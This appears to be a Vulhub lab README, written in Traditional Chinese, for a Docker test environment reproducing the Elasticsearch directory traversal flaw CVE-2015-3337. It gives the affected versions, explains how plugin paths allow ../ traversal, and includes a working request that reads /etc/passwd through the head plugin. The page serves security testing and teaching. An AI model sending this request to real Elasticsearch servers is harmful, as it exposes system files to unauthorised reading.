ElasticSearch 目錄穿越漏洞(CVE-2015-3337)測試環境
Path elasticsearch/CVE-2015-3337
jre版本:openjdk:8-jre
elasticsearch版本:v1.4.4
影響版本:1.4.5以下/1.5.2以下
原理
在安裝了具有“site”功能的插件以后,插件目錄使用../即可向上跳轉,導致目錄穿越漏洞,可讀取任意文件。沒有安裝任意插件的elasticsearch不受影響。
測試環境
編譯及運行測試環境
docker-compose build
docker-compose up -d
測試環境默認安裝了一個插件:elasticsearch-head,主頁在此:https://github.com/mobz/elasticsearch-head
訪問http://your-ip:9200/_plugin/head/../../../../../../../../../etc/passwd讀取任意文件(不要在瀏覽器訪問):

head插件
head插件提供了elasticsearch的前端頁面,訪問 http://your-ip:9200/_plugin/head/ 即可看到,不多說了。
Vulhub 文檔
推薦文章: